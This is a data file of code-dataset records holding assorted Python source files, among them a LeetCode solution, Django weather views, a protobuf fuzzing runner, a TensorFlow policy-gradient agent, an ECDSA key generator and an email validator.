+{"seq_id":"116422217","text":"from typing import List\nfrom collections import OrderedDict\n# import pandas as pd\nclass Solution:\n def displayTable(self, orders: List[List[str]]) -> List[List[str]]:\n \"\"\"\n [\"David\",\"3\",\"Ceviche\"],[\"Corina\",\"10\",\"Beef Burrito\"],\n :param orders:\n :return:\n \"\"\"\n ret = OrderedDict()\n food_list = []\n table_list = []\n for order in orders:\n name, table, food = order[0], int(order[1]),order[2]\n ret[table] = ret.get(table, OrderedDict())\n ret[table][food] = ret[table].get(food, 0)+1\n food_list.append(food)\n table_list.append(table)\n food_list = list(set(food_list))\n table_list = list(set(table_list))\n food_list.sort()\n table_list.sort()\n\n result = []\n food_list.insert(0, 'Table')\n result.append(food_list)\n for table in table_list:\n temp = [f\"{table}\"]\n for food in food_list[1:]:\n temp.append(f\"{ret[table].get(food, 0)}\")\n result.append(temp)\n\n # print(ret)\n return result\n\nif __name__ == '__main__':\n s = Solution()\n ans = s.displayTable([[\"David\",\"3\",\"Ceviche\"],[\"Corina\",\"10\",\"Beef Burrito\"],[\"David\",\"3\",\"Fried Chicken\"],[\"Carla\",\"5\",\"Water\"],[\"Carla\",\"5\",\"Ceviche\"],[\"Rous\",\"3\",\"Ceviche\"]])\n print(ans)\n #\n orders = [[\"James\", \"12\", \"Fried Chicken\"], [\"Ratesh\", \"12\", \"Fried Chicken\"],\n [\"Amadeus\", \"12\", \"Fried Chicken\"], [\"Adam\", \"1\", \"Canadian Waffles\"],\n [\"Brianna\", \"1\", \"Canadian Waffles\"]]\n ans = s.displayTable(orders)\n print(ans)\n\n orders = [[\"Laura\", \"2\", \"Bean Burrito\"], [\"Jhon\", \"2\", \"Beef Burrito\"], [\"Melissa\", \"2\", \"Soda\"], [\"Laura\", \"2\", \"Bean Burrito\"]]\n ans = s.displayTable(orders)\n print(ans)","sub_path":"contests/week185/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"126796362","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render,redirect, get_object_or_404\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.template import RequestContext\nfrom django.contrib.auth.decorators import login_required\n\nfrom weather.forms import SearchForm,SigninForm, RegisterForm\nfrom weather.models import City, Forecast, UserProfile\n\nfrom datetime import date\nfrom tools.geoip_api import get_city_from_IP\nfrom tools import openweather_api\n# Create your views here.\ndef home(request):\n # ip_addr = request.META.get('HTTP_X_REAL_IP')\n # city_name = get_city_from_IP(ip_addr)\n city_name = request.COOKIES.get('city_name', '')\n if not city_name:\n city_name = 'Kiev'\n city = False\n try:\n city = City.objects.get(name__icontains=city_name)\n except:\n pass\n if not city:\n new_city = City.objects.create(name=city_name, population=0, country='-')\n info = openweather_api.parse_json_info(new_city.name)\n forecast = Forecast(city=new_city, temperature = info['temperature'], wind_speed = info['wind_speed'],\n weather_description = info['weather_description'], humidity = info['humidity'],\n pressure = info['pressure'])\n forecast.save()\n city = new_city\n forecasts = []\n try:\n forecasts = Forecast.objects.filter(city=city)[1:7]\n except:\n pass\n return render(request,'justweather/home.html', {'city': city, 'forecasts': forecasts})\n\ndef search(request):\n if request.method == 'GET':\n if 'city_name' in request.GET and request.GET['city_name']:\n form = SearchForm(request.GET)\n if form.is_valid():\n city_name = form.cleaned_data['city_name']\n city = City.objects.filter(name__icontains=city_name)\n if len(city) > 1:\n return render(request, 'justweather/search.html', {'cities_list': city, 'form': form})\n else:\n if city:\n forecasts=[]\n try:\n forecasts = Forecast.objects.filter(city=city)[1:7]\n except Exception:\n pass\n response = render(request, 'justweather/home.html', {'city': city[0], 'form': form, 'forecasts': forecasts})\n response.set_cookie('city_name', city_name)\n return response\n elif not form.is_valid():\n city = None\n return render(request, 'justweather/search.html', {'cities_list': city, 'form': form})\n cities_list = City.objects.order_by('-population')[0:16]\n form = SearchForm()\n return render(request, 'justweather/search.html', {'cities_list': cities_list, 'form': form})\n\ndef signin(request):\n if request.method == 'POST':\n form = SigninForm(request, {'username': request.POST.get('username'),\n 'password': request.POST.get('password')})\n if form.is_valid():\n user = form.get_user()\n if user:\n login(request, user)\n if not request.POST.get('remember-me', ''):\n request.session.set_expiry(0)\n return render(request, 'justweather/signin.html', {'form': form})\n return render(request, 'justweather/signin.html', {'form': form})\n return render(request, 'justweather/signin.html', {'usver': request.user})\n\n@login_required\ndef logout_view(request):\n logout(request)\n return HttpResponse('Successfully logged out! \\(^_^)/')\n\ndef registration_view(request):\n if request.method == 'POST':\n form = RegisterForm(request.POST)\n if form.is_valid():\n new_user = form.save()\n user = authenticate(username=form.cleaned_data['username'], password=form.cleaned_data['password1'])\n UserProfile.objects.create(user=user)\n login(request, user)\n return render(request, 'justweather/my_profile.html')\n else:\n return render(request, 'justweather/registration.html', {'form': form})\n else:\n form = RegisterForm()\n return render(request, 'justweather/registration.html', {'form': form})\n\n@login_required\ndef my_profile(request):\n return render(request, 'justweather/my_profile.html')\n\n@login_required\ndef my_places(request):\n return render(request, 'justweather/my_places.html')\n\n@login_required\ndef add_to_favorites(request, city_pk):\n city = get_object_or_404(City, pk=city_pk)\n request.user.userprofile.favorite_cities.add(city)\n return HttpResponse()\n\n@login_required\ndef del_from_favorites(request, city_pk):\n city = get_object_or_404(City, pk = city_pk)\n request.user.userprofile.favorite_cities.remove(city)\n return HttpResponse()\n\ndef search_ajax(request):\n if request.method == 'GET':\n if 'city_name' in request.GET and request.GET['city_name']:\n form = SearchForm(request.GET)\n if form.is_valid():\n city_name = form.cleaned_data['city_name']\n city = City.objects.filter(name__icontains=city_name)\n if not city:\n city=[]\n return render(request, 'justweather/search_options.html', {'cities_list': city})\n elif not form.is_valid():\n return render(request, 'justweather/search_options.html', {'form': form})","sub_path":"weather/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"114746583","text":"import json\nfrom sqlalchemy import desc, asc\nfrom starlette.endpoints import HTTPEndpoint\nfrom starlette.responses import JSONResponse\n\n\nclass ListResource(HTTPEndpoint):\n page = 1\n pages = 1\n limit = 10\n\n async def apply_filters(self):\n '''\n Apply filters for items\n example url site.com/api/users?filters=[\n {\"key\": \"nickname\", \"operator\": \"==\", \"value\": \"leonardo\"}\n ]\n '''\n\n filters = json.loads(\n self.request.query_params.get('filters', '[]'))\n\n for filter in filters:\n key = filter.get('key')\n value = filter.get('value')\n method = filter.get('operator')\n\n # start with helper\n if method == 'startWith':\n method = 'ilike'\n value = f'{value}%'\n\n column = getattr(self.model, key, None)\n operator = getattr(column, method, None)\n\n if operator:\n self.query = self.query.where(operator(value))\n\n if method == '==':\n self.query = self.query.where(column == value)\n if method == '>=':\n self.query = self.query.where(column >= value)\n if method == '>':\n self.query = self.query.where(column > value)\n if method == '<=':\n self.query = self.query.where(column <= value)\n if method == '<':\n self.query = self.query.where(column < value)\n if method == '!=':\n self.query = self.query.where(column != value)\n\n async def apply_paginate(self):\n pagination = json.loads(\n self.request.query_params.get(\n 'pagination',\n f'{{\"page\": 1, \"limit\": {self.limit} }}'))\n\n page = pagination.get('page')\n limit = pagination.get('limit')\n count = await self.db.func.count(self.model.id).gino.scalar()\n offset = (page - 1) * limit\n\n self.query = self.query.limit(limit).offset(offset)\n self.pages = count // limit\n if count % limit != 0:\n self.pages = self.pages + 1\n\n async def get(self, request):\n self.request = request\n self.query = self.model.query.order_by(asc(self.model.id))\n await self.apply_filters()\n await self.apply_paginate()\n\n items = await self.query.gino.all()\n\n return JSONResponse({\n 'success': True,\n 'items': self.schema(many=True).dump(items),\n 'pages': self.pages\n })\n\n async def post(self, request):\n\n data = await request.json()\n item = await self.model.create(**data)\n\n return JSONResponse({\n 'success': True,\n 'item': self.schema().dump(item)\n })\n","sub_path":"backend/app/core/api/list_resource.py","file_name":"list_resource.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"1360534","text":"\"\"\"\nFiles involved:\n\nprotobuf_file_generator - initial tester to fuzz into binary\n /Users/balazsattila/Env/fuzz_framework/framework/services/protobuf_generator.py\n\nprotobuf_target - extend and refactor file target to handle protobuf binary message file\n /Users/balazsattila/Env/fuzz_framework/third_party/katnip/katnip/targets/protobuf.py\n\nprotobuf_template - templating system which can handle protobuf message creation\n /Users/balazsattila/Env/fuzz_framework/third_party/katnip/katnip/templates/protobuf.py\n\nprotobuf_runner - this file which will run the protobuf over HTTP\n /Users/balazsattila/Env/fuzz_framework/framework/bin/protobuf_runner.py\n\nprotobuf_controller - this control and lego the fuzzer process via Kitty/Katnip API\n /Users/balazsattila/Env/fuzz_framework/framework/controllers/protobuf/protobuf_controller.py\n\n\nArchitecture of Fuzzing according to Kitty API.:\n\n Fuzzer +--- Model *--- Template *--- Field\n |\n +--- Target +--- Controller\n | |\n | *--- Monitor\n |\n +--- Interface (WebInterface)\n\n\"\"\"\nimport time\nimport six\n\nfrom kitty.model import Template, GraphModel\nfrom kitty.fuzzers import ServerFuzzer\nfrom kitty.interfaces import WebInterface\n\nfrom framework.core.fuzz_object import FuzzObject\nfrom framework.services.parse_config import ConfigParser\nfrom framework.utils.utils import FrameworkUtils\nfrom framework.utils import ext_json\nfrom framework.controllers.protobuf.protobuf_controller import ProtobufController\nfrom framework.targets.protobuf_target import ProtobufTarget\n\n\nclass ProtobufRunner(FuzzObject):\n\n def __init__(self, pb2_api, name='ProtobufRunner', logger=None):\n super(ProtobufRunner, self).__init__(name, logger)\n self.pb2_api = pb2_api\n self.config = ConfigParser()\n self.target_host = self.config.get_target_host_name()\n self.target_port = self.config.get_target_port()\n self.frmu = FrameworkUtils()\n\n def run_proto(self) -> None:\n \"\"\"\n kitty low level field model\n https://kitty.readthedocs.io/en/latest/kitty.model.low_level.field.html\n \"\"\"\n\n js = ext_json.dict_to_JsonObject(dict(self.pb2_api[0]['Messages']), 'api')\n\n template_a = Template(name='Api', fields=js)\n\n self.logger.info(f\"[{time.strftime('%H:%M:%S')}] Prepare ProtobufTarget \")\n target = ProtobufTarget('ProtobufTarget',\n host=self.target_host,\n port=self.target_port,\n max_retries=10,\n timeout=None,\n pb2_module=self.pb2_api[1])\n\n self.logger.info(f\"[{time.strftime('%H:%M:%S')}] Prepare ProtobufController \")\n controller = ProtobufController('ProtobufController', host=self.target_host, port=self.target_port)\n target.set_controller(controller)\n #target.set_expect_response('true')\n self.logger.info(f\"[{time.strftime('%H:%M:%S')}] Defining GraphModel\")\n model = GraphModel()\n model.connect(template_a)\n\n self.logger.info(f\"[{time.strftime('%H:%M:%S')}] Prepare Server Fuzzer \")\n fuzzer = ServerFuzzer()\n fuzzer.set_interface(WebInterface(port=26001))\n fuzzer.set_model(model)\n fuzzer.set_target(target)\n fuzzer.start()\n self.logger.info(f\"[{time.strftime('%H:%M:%S')}] Start Fuzzer\")\n self.logger.info(f\"[Further info are in the related Kitty log output!]\")\n six.moves.input('press enter to exit')\n self.logger.info(f\"[{time.strftime('%H:%M:%S')}] End Fuzzer Session\")\n fuzzer.stop()\n","sub_path":"framework/runners/protobuf_runner.py","file_name":"protobuf_runner.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"120749169","text":"import tensorflow as tf\nimport numpy as np\nfrom skimage import color, transform\n\n# TODO Build the policy gradient neural network\nclass Agent:\n def __init__(self, num_actions, state_size):\n initializer = tf.contrib.layers.xavier_initializer()\n\n self.input_layer = tf.placeholder(dtype=tf.float32, shape=[None, state_size[0], state_size[1], 1])\n # self.input_layer = tf.cast(self.input_layer, dtype=tf.float32)\n # self.input_layer = tf.reshape(self.input_layer, [None, 16, 8])\n '''self.input_layer = np.array(self.input_layer)\n print((self.input_layer))\n self.input_layer = self.input_layer.reshape(-1, 16, 8)'''\n # Neural net starts here\n '''conv_1 = tf.layers.conv2d(self.input_layer,\n filters=8,\n kernel_size=[4, 4],\n padding=\"same\",\n activation=tf.nn.relu, name=\"Conv1\")\n\npool_1 = tf.layers.max_pooling2d(conv_1,\n pool_size=[2, 2],\n strides=2, name=\"Pool1\")'''\n\n conv_2 = tf.layers.conv2d(self.input_layer,\n filters=4,\n kernel_size=[2, 2],\n padding=\"same\",\n activation=tf.nn.relu, name=\"Conv2\")\n\n pool_2 = tf.layers.max_pooling2d(conv_2,\n pool_size=[2, 2],\n strides=1, name=\"Pool2\")\n dropout0 = tf.layers.dropout(pool_2, rate=.5, training=True, name=\"Dropout_0\")\n flattenened_pooling = tf.layers.flatten(dropout0, name=\"Flatten\")\n hidden_layer = tf.layers.dense(flattenened_pooling,\n 6,\n activation=tf.nn.relu,\n kernel_initializer=initializer, name=\"A1\")\n dropout1 = tf.layers.dropout(hidden_layer, rate=.5, training=True, name=\"Dropout_1\")\n hidden_layer_2 = tf.layers.dense(dropout1, 6, activation=tf.nn.relu, kernel_initializer=initializer, name=\"A2\")\n dropout2 = tf.layers.dropout(hidden_layer_2, rate=.5, training=True, name=\"Dropout_2\")\n # Output of neural net\n out = tf.layers.dense(dropout2, num_actions, kernel_initializer=initializer, activation=None, name=\"Output\")\n\n self.outputs = tf.nn.softmax(out, name=\"Softmax_Output\")\n self.choice = tf.argmax(self.outputs, axis=1, name=\"Choice\")\n\n # Training Procedure\n self.rewards = tf.placeholder(shape=[None, ], dtype=tf.float32, name=\"Rewards\")\n self.actions = tf.placeholder(shape=[None, ], dtype=tf.int32, name=\"Actions\")\n\n one_hot_actions = tf.one_hot(self.actions, num_actions, name=\"One_Hot\")\n\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=out, labels=one_hot_actions, name=\"SoftCross\")\n\n self.loss = tf.reduce_mean(cross_entropy * self.rewards, name=\"Loss\")\n\n self.gradients = tf.gradients(self.loss, tf.trainable_variables(), name=\"Gradients\")\n\n # Create a placeholder list for gradients\n self.gradients_to_apply = []\n for index, variable in enumerate(tf.trainable_variables()):\n gradient_placeholder = tf.placeholder(tf.float32)\n self.gradients_to_apply.append(gradient_placeholder)\n\n # Create the operation to update gradients with the gradients placeholder.\n optimizer = tf.train.AdamOptimizer(learning_rate=1e-4, name=\"Optimizer\")\n self.update_gradients = optimizer.apply_gradients(zip(self.gradients_to_apply, tf.trainable_variables()))\n\n\nclass EnvironmentControl:\n discount_rate = 0.95\n\n def __init__(self, state_size, max_steps_in_episode, num_of_episode, episode_batch_size):\n self.state_size = state_size\n self.max_steps_in_episode = max_steps_in_episode\n self.num_of_episodes = num_of_episode\n self.episode_batch_size = episode_batch_size\n\n def resize_state(self, state):\n if state.shape[-1] == 1:\n return state\n return transform.rescale(color.rgb2gray(state), 1/4).reshape(-1, self.state_size[0], self.state_size[1], 1)\n\n\n def discount_normalize_rewards(self, rewards):\n discounted_rewards = np.zeros_like(rewards)\n total_rewards = 0\n\n for i in reversed(range(len(rewards))):\n total_rewards = total_rewards * self.discount_rate + rewards[i]\n discounted_rewards[i] = total_rewards\n\n discounted_rewards -= np.mean(discounted_rewards)\n discounted_rewards /= np.std(discounted_rewards)\n\n return discounted_rewards\n","sub_path":"model_mario.py","file_name":"model_mario.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"212292175","text":"\nimport os\nimport sys\nfrom subprocess import Popen, PIPE\nimport re\n\nfrom acousticsim.representations.formants import Formants\nfrom acousticsim.representations.pitch import Pitch\nfrom acousticsim.representations.intensity import Intensity\nfrom acousticsim.representations.base import Representation\nfrom acousticsim.representations.mfcc import Mfcc, freq_to_mel\n\nfrom acousticsim.exceptions import AcousticSimPraatError\n\ndef to_pitch_praat(filepath, praatpath = None, time_step = 0.01, freq_lims = (75, 600), attributes = None):\n script = 'pitch.praat'\n if praatpath is None:\n praatpath = 'praat'\n if sys.platform == 'win32':\n praatpath.append('con.exe')\n listing = run_script(praatpath, script, filepath, time_step, freq_lims[0], freq_lims[1])\n output = Pitch(filepath, time_step, freq_lims, attributes = attributes)\n r = read_praat_out(listing)\n for k,v in r.items():\n r[k] = [v['Pitch']]\n output.rep = r\n return output\n\ndef to_formants_praat(filepath, praatpath = None, time_step = 0.01,\n win_len = 0.025, num_formants = 5, max_freq = 5000, attributes = None):\n script = 'formants.praat'\n listing = run_script(praatpath, script, filepath, time_step,\n win_len, num_formants, max_freq)\n output = Formants(filepath, max_freq, num_formants, win_len,\n time_step, attributes = attributes)\n r = read_praat_out(listing)\n for k,v in r.items():\n new_v = list()\n for i in range(1,num_formants+1):\n try:\n new_v.append((v['F%d'%i],v['B%d'%i]))\n except KeyError:\n new_v.append((None,None))\n r[k] = new_v\n output.rep = r\n return output\n\ndef to_intensity_praat(filepath, praatpath = None, time_step = 0.01, attributes = None):\n script = 'intensity.praat'\n listing = run_script(praatpath, script, filepath, time_step)\n output = Intensity(filepath, time_step, attributes = attributes)\n r = read_praat_out(listing)\n for k,v in r.items():\n r[k] = [v['Intensity']]\n output.rep = r\n return output\n\ndef to_mfcc_praat(filepath, praatpath = None, num_coeffs = 12,\n win_len = 0.025, time_step = 0.01, max_freq = 7800, use_power = False, attributes = None):\n script = 'mfcc.praat'\n listing = run_script(praatpath, script, filepath, num_coeffs, win_len, time_step, freq_to_mel(max_freq))\n output = Mfcc(filepath, (0,max_freq), num_coeffs, win_len, time_step,\n attributes = attributes, process = False)\n r = read_praat_out(listing)\n for k,v in r.items():\n r[k] = [v[k2] for k2 in sorted(v.keys())]\n output.rep = r\n\n return output\n\ndef run_script(praatpath, name, *args):\n script_dir = os.path.dirname(os.path.abspath(__file__))\n com = [praatpath]\n if praatpath.endswith('con.exe'):\n com += ['-a']\n com +=[os.path.join(script_dir,name)] + list(map(str,args))\n with Popen(com,stdout=PIPE,stderr=PIPE,stdin=PIPE) as p:\n try:\n text = str(p.stdout.read().decode('latin'))\n err = str(p.stderr.read().decode('latin'))\n except UnicodeDecodeError:\n print(p.stdout.read())\n print(p.stderr.read())\n if err:\n raise(AcousticSimPraatError(err))\n return text\n\ndef read_praat_out(text):\n if not text:\n return None\n lines = text.splitlines()\n head = None\n while head is None:\n try:\n l = lines.pop(0)\n except IndexError:\n print(text)\n raise\n if l.startswith('time'):\n head = re.sub('[(]\\w+[)]','',l)\n head = head.split(\"\\t\")[1:]\n output = {}\n for l in lines:\n if '\\t' in l:\n line = l.split(\"\\t\")\n time = line.pop(0)\n values = {}\n for j in range(len(line)):\n v = line[j]\n if v != '--undefined--':\n try:\n v = float(v)\n except ValueError:\n print(text)\n print(head)\n else:\n v = 0\n values[head[j]] = v\n if values:\n output[float(time)] = values\n return output\n","sub_path":"acousticsim/praat/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"528446231","text":"def count():\n file = input('masukkan file ber-ekstensi txt yang ingin dibuka: ')\n\n\n try:\n with open(file) as o:\n text = o.read()\n print(text)\n char = input('masukkan char yang ingin dihitung: ')\n hitung = 0\n\n for i in text:\n if i == char:\n hitung += 1\n print('jumlah huruf {0} pada {1} adalah {2}'.format(char, file, hitung))\n except:\n print('file text tidak ada didalam folder')\n\n\ncount()","sub_path":"ProjectR/SistemLogin/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"647174236","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import linalg \nimport scipy.fftpack as fft\nfrom scipy import ndimage\n\nimg = plt.imread(\"arbol.png\")\n#retorna matriz de numpy de 256x256\n\nfourier=(fft.ifft2(img))\n\nfrecuencia=np.fft.fftfreq(len(fourier[0].real))\n\nplt.figure(\"Fourier\")\nplt.plot(frecuencia,fourier)\nplt.savefig(\"LeonBenjamin_FT2D.pdf\")\n\n\n#filtro, quitamos la locacion exacta en las frecuencias donde se hallaba el ruido\n#los tres errores que bota el ejercicio son señales de precaucion al usuario por que no estamos teniendo en cuenta la parte imaginaria de la transformada\t\ni=0\nwhile i<256:\n\t\tif ((abs(frecuencia[i].real)>0.24 and abs(frecuencia[i].real)<0.26)or(abs(frecuencia[i].real)>0.038 and abs(frecuencia[i].real)<0.043)):\n\t\t\tfourier[i]=0\n\t\t\ti=i+1\n\t\telse:\n\t\t\ti=i+1\nplt.figure(\"Fourier Filtrada\")\nplt.plot(frecuencia,fourier)\nplt.savefig(\"LeonBenjamin_FT2D_filtrada.pdf\")\n\n\n\ninversatotal=fft.ifft2(fourier).real\n#Utilizamos parte real\nplt.figure(\"Imagen Filtrada\")\nplt.imshow(inversatotal,cmap=\"gray\",origin=\"lower\")\n#utilizamos origin porque la imagen sali al revez\nplt.savefig(\"LeonBenjamin_Imagen_filtrada.pdf\")\n\n\n\n","sub_path":"Fourier2D.py","file_name":"Fourier2D.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"7430285","text":"import hashlib\r\nfrom ecdsa import SigningKey, VerifyingKey, SECP256k1 \r\n\r\ndef print_byte_array(byte_array):\r\n\ti = 0\r\n\tfor data in byte_array:\r\n\t\tprint(\"%0.2X \" % data, end = \"\") \r\n\t\ti = i+1\r\n\t\tif (i == 16):\r\n\t\t\tprint(\" \")\r\n\t\t\ti = 0\r\n\tprint(\"\\n\\n\")\r\n\t\r\n#Generate keyPair and save both to disk\r\n\r\ndef main():\r\n\tprint(\"Generating random private key & public key pair with SECP256k1 curve\")\r\n\tsk = SigningKey.generate(curve=SECP256k1, hashfunc=hashlib.sha256)\r\n\tprint(\"==========Private======================\")\r\n\tprint_byte_array(sk.to_string())\r\n\tprint(\"==========Public======================\")\r\n\tvk = sk.verifying_key\r\n\tprint_byte_array(vk.to_string())\r\n\r\n\twith open(\"private.pem\", \"wb\") as f:\r\n\t\tf.write(sk.to_pem())\r\n\twith open(\"public.pem\", \"wb\") as f:\r\n\t\tf.write(vk.to_pem())\r\n\tprint(\"private.pem , public.pem saved\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","sub_path":"ci/KeyGenerator.py","file_name":"KeyGenerator.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"266126269","text":"# -*- coding: utf8 -*-fr\n# pylint: disable=too-many-instance-attributes, invalid-name\n\"\"\"\nHasVirtualHost is a mixin representing the virtualhost attached to some of the objects.\n\"\"\"\n\nfrom itopapi.model.prototype import ItopapiPrototype\n\n__version__ = '1.0'\n__authors__ = ['Julien Nauroy ']\n\n\nclass HasVirtualHost(object):\n \"\"\"\n HasVirtualHost represents the VirtualHost attached to some top-level objects.\n \"\"\"\n\n \"\"\" Configuration specific to itop \"\"\"\n foreign_key = {'id': 'virtualhost_id', 'name': 'virtualhost_name', 'table': 'VirtualHost'}\n\n def __init__(self):\n super(HasVirtualHost, self).__init__()\n\n # Object's virtualhost id. Call find_virtualhost to get the full information or just use\n # virtualhost_id_friendlyname and virtualhost_name\n self.virtualhost_id = None\n # Object's virtualhost id's friendly name. Not sure the difference with virtualhost_name\n self.virtualhost_id_friendlyname = None\n # Object's virtualhost name\n self.virtualhost_name = None\n\n def find_virtualhost(self):\n \"\"\"\n Retrieve the ItopapiVirtualHost related to this instance\n \"\"\"\n if self.virtualhost_id is not None:\n return ItopapiPrototype.get_itop_class('VirtualHost').find(self.virtualhost_id)\n return None\n\n def set_virtualhost(self, virtualhost):\n \"\"\"\n Set the ItopapiVirtualHost parameters\n \"\"\"\n self.virtualhost_id = virtualhost.instance_id\n self.virtualhost_id_friendlyname = virtualhost.friendlyname\n self.virtualhost_name = virtualhost.name\n","sub_path":"itopapi/model/features/hasVirtualHost.py","file_name":"hasVirtualHost.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"217752926","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Filename: lqr.py\n# @Date: 2019-07-15-12-59\n# @Author: Hany Abdulsamad\n# @Contact: hany@robot-learning.de\n\nimport gym\nimport matplotlib.pyplot as plt\n\nfrom rl.pgpe import PGPE\n\nenv = gym.make('LQR-RL-v0')\nenv._max_episode_steps = 100\n\npgpe = PGPE(env, n_episodes=100,\n discount=0.995,\n alpha=1e-5, beta=1e-8,\n pdict={'type': 'poly', 'degree': 1, 'cov0': 0.1})\n\ntrace = pgpe.run(nb_iter=10, verbose=True)\n\nrollouts = pgpe.sample(25)\n\nfig = plt.figure()\nfor r in rollouts:\n plt.plot(r['x'][:, 0])\nplt.show()\n","sub_path":"examples/pgpe/lqr.py","file_name":"lqr.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"557651610","text":"dongu_kontrol = False\r\nwhile not dongu_kontrol:\r\n kullanici_adi = input(\"kullanici adi giriniz:\")\r\n uzanti = input(\"(@ sonraki ifade) uzanti adresi giriniz:\")\r\n boyut = len(kullanici_adi)\r\n liste = list(kullanici_adi)\r\n boyut1 = len(uzanti)\r\n liste1 = list(uzanti)\r\n uzantikontrol = 0\r\n kontrol = 0\r\n kullanicikontrol = 0\r\n karakter = '-', '_'\r\n ana_karakter = '@'\r\n nokta = \".\"\r\n mail = kullanici_adi+uzanti\r\n if boyut >= 1 and boyut <= 12 and boyut1 >= 1 and boyut1 <= 60:\r\n for i in range(boyut):\r\n if liste[i].isupper():\r\n kontrol = 1\r\n elif liste[i].islower():\r\n kontrol = 1\r\n if kontrol == 0:\r\n kullanicikontrol = 1\r\n kontrol = 0\r\n\r\n for i in range(boyut):\r\n if liste[i] in karakter:\r\n kullanicikontrol = 0\r\n kontrol = 0\r\n kontrol = 0\r\n\r\n for i in range(boyut):\r\n if kullanici_adi.startswith(ana_karakter):\r\n kontrol = 1\r\n kullanicikontrol = 1\r\n break\r\n elif kullanici_adi.endswith(ana_karakter):\r\n kontrol = 0\r\n kullanicikontrol = 0\r\n if kontrol == 0:\r\n kullanicikontrol = 0\r\n kontrol = 0\r\n\r\n for i in range(boyut):\r\n if liste.count(ana_karakter) == 1:\r\n kontrol = 0\r\n kullanicikontrol = 0\r\n else:\r\n kullanicikontrol = 1\r\n kontrol = 1\r\n if kontrol == 0:\r\n kullanicikontrol = 0\r\n kontrol = 1\r\n\r\n for i in range(boyut1):\r\n if liste1[i] in nokta:\r\n if liste1.count(nokta) >= 1 and liste1.count(nokta) <= 2:\r\n uzantikontrol = 0\r\n kontrol = 0\r\n else:\r\n uzantikontrol = 1\r\n kontrol = 1\r\n if kontrol == 0:\r\n uzantikontrol = 0\r\n kontrol = 1\r\n\r\n for i in range(boyut1):\r\n if uzanti.startswith(nokta):\r\n kontrol = 1\r\n uzantikontrol = 1\r\n\r\n if uzanti.endswith(nokta):\r\n kontrol = 1\r\n uzantikontrol = 1\r\n if kontrol == 0:\r\n uzantikontrol = 0\r\n kontrol = 0\r\n\r\n\r\n if kullanicikontrol == 0 and uzantikontrol == 0:\r\n print('uzantı boyutu',liste1.count(nokta)+1)\r\n print(mail)\r\n print(\"BASARILI\")\r\n dongu_kontrol = True\r\n else:\r\n print('uzantı boyutu', liste1.count(nokta) + 1)\r\n print(mail)\r\n print(\"BASARISIZ\")\r\n\r\n else:\r\n print(\"GECERSIZ BOYUT.!!!\")","sub_path":"odevler_proje/python_odev/python-problemset-2.py","file_name":"python-problemset-2.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"12514232","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n \n def clone(self, node, adder):\n if node == None:\n return None\n tree = TreeNode(node.val + adder)\n tree.left = self.clone(node.left, adder)\n tree.right = self.clone(node.right, adder)\n return tree\n \n def generateTrees(self, n: int) -> List[TreeNode]:\n if n == 0:\n return []\n dp = {}\n dp[0] = [None]\n dp[1] = [TreeNode(1)]\n dp[2] = [TreeNode(1, None, TreeNode(2)), TreeNode(2, TreeNode(1), None)]\n for i in range(3, n+1):\n dp[i] = []\n for j in range(1, i+1):\n for left_node in dp[j-1]:\n for right_node in dp[i-j]:\n newTree = TreeNode(j)\n newTree.left = self.clone(left_node, 0)\n newTree.right = self.clone(right_node, j)\n dp[i].append(newTree)\n return dp[n]","sub_path":"data_structures/tree/construct_bst_for_1_to_n/leetcode.py","file_name":"leetcode.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
